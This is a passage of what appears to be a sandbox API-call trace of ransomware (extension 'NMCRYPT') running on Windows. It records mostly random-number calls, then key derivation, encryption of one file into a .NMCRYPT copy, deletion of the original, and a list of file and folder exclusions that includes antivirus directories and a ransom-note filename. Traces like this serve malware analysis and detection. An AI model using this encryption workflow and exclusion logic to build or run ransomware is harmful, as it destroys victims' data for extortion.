[0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.441] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.442] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.442] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.443] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0155.443] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.443] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad478) returned 1 [0155.443] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.443] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.443] wcslen (_String="\\\\?\\") returned 0x4 [0155.443] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad438) returned 1 [0155.443] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.443] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.443] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=213) returned 1 [0155.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.444] ReadFile (in: hFile=0x1624, lpBuffer=0x28d5078, nNumberOfBytesToRead=0xd5, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d5078*, lpNumberOfBytesRead=0x2d7e160*=0xd5, lpOverlapped=0x0) returned 1 [0155.445] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xd5, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xe0) returned 1 [0155.445] GetLastError () returned 0x0 [0155.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xe0, lpOverlapped=0x0) returned 1 [0155.445] ReadFile (in: hFile=0x1624, lpBuffer=0x28d5078, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d5078*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.445] WriteFile (in: hFile=0x588, lpBuffer=0x28d5078*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x28d5078*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.446] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml")) returned 0x20 [0155.446] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml", dwFileAttributes=0x20) returned 0 [0155.446] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml") returned 1 [0155.446] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml")) returned 0 [0155.446] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" [0155.446] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.446] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD25B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd25b.tmp")) returned 0xd25b [0155.448] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD25B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd25b.tmp"), dwFlags=0x1) returned 0 [0155.448] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD25B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd25b.tmp")) returned 1 [0155.448] CryptDestroyKey (hKey=0x9ad438) returned 1 [0155.448] wcslen (_String="OK") returned 0x2 [0155.448] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.448] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.448] CryptDestroyKey (hKey=0x9ad478) returned 1 [0155.448] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0155.448] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0155.448] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.448] wcscmp (_String1="osknumpad", _String2=".") returned 1 [0155.448] wcscmp (_String1="osknumpad", _String2="..") returned 1 [0155.448] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.448] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*NMCRYPT") returned 0 [0155.448] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*Recovers your files.html") returned 0 [0155.448] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*.exe") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*.dll") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*.lnk") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*.bat") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*.ini") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*.msi") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*.scf") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*pagefile.sys*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*AppData*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\winrar\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\java\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\windows\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\ESET\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\AVG\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*Atheros*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*Realtek*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*bootmgr*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*boot*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*boot*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*IO.SYS*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*MSDOS.SYS*") returned 